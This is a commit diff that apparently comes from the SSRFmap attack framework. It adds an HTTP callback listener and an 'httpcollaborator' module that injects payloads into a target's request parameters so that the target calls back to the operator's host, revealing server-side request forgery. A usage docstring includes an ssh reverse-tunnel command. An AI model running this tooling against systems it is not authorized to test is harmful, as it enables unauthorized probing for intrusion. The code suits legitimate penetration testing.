Update handlers: add http handler and httpcollaborator module

2020-01-09 00:41:09 +07:00 · 2020-01-09 00:41:09 +07:00 · a94dd361a7
parent 3d737a7e72
commit a94dd361a7
2 changed files with 93 additions and 0 deletions
--- a/handlers/http.py
+++ b/handlers/http.py
@ -0,0 +1,50 @@
+from core.utils import *
+from core.handler import Handler
+import re
+import logging
+import urllib.parse
+
+class exploit(Handler):
+
+  def __init__(self, port):
+    super().__init__(port)
+
+  def run(self):
+    self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+    self.socket.bind(('', self.port))
+    self.injected_params = []
+
+    while True:
+        self.socket.listen(5)
+        self.client, address = self.socket.accept()
+
+        response = self.client.recv(1024).decode()
+        if self.socket._closed or not response:
+            break
+
+        logging.info("New session from : \033[32m{}\033[0m".format( address[0] ))
+        self.connected = True
+
+        regex = re.compile('(.*) (.*) HTTP')
+        request_method, request_action = regex.findall(response)[0]
+        request_param = urllib.parse.urlsplit(request_action).query
+        logging.info("Possible injected param: \033[32m{}\033[0m".format( request_param ))
+        self.injected_params.append(request_param)
+
+        response_header = "HTTP/1.1 200 OK\n"
+        response_header += 'Server: I-See-You\n'
+        response_header += 'Connection: close\n\n'
+        self.client.send(response_header.encode())
+        self.client.close()
+
+  def kill(self):
+    socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect(self.socket.getsockname()) # trigger last connection to closing
+    self.socket.close()
+
+  def listen_command(self):
+    # shutdown handler
+    if not self.socket._closed:
+      self.kill()
+    else:
+      exit()
--- a/modules/httpcollaborator.py
+++ b/modules/httpcollaborator.py
@ -0,0 +1,43 @@
+from core.utils import *
+from core.handler import Handler
+import re
+import logging
+import urllib.parse
+
+"""
+Example:
+```
+~$ python3 ssrfmap.py -v -r data/request.txt -p url,path --lhost=public-ip --lport 4242 -m httpcollaborator -l http
+```
+Use ssh/autossh to established remote tunnel between public and localhost handler if running module locally against remote target
+```
+~$ ssh -fN -R public-ip:4242:127.0.0.1:4242 username@public-ip
+```
+"""
+
+name          = "httpcollaborator"
+description   = "This module act like burpsuite collaborator through http protocol to detect if target parameters are prone to ssrf"
+author        = "xyzkab"
+documentation = []
+
+class exploit():
+    SERVER_HOST = "127.0.0.1"
+    SERVER_PORT = "4242"
+
+    def __init__(self, requester, args):
+        logging.info("Module '{}' launched !".format(name))
+
+        # Handle args for httpcollaborator
+        if args.lhost == None: self.SERVER_HOST = input("Server Host:")
+        else:                  self.SERVER_HOST = args.lhost
+
+        if args.lport == None: self.SERVER_PORT = input("Server Port:")
+        else:                  self.SERVER_PORT = args.lport
+
+        params = args.param.split(",")
+        for param in params:
+            logging.info("Testing PARAM: {}".format(param))
+            payload = wrapper_http("?{}".format(param), args.lhost, args.lport.strip() )
+            r = requester.do_request(param, payload)
+
+        logging.info("Module '{}' finished !".format(name))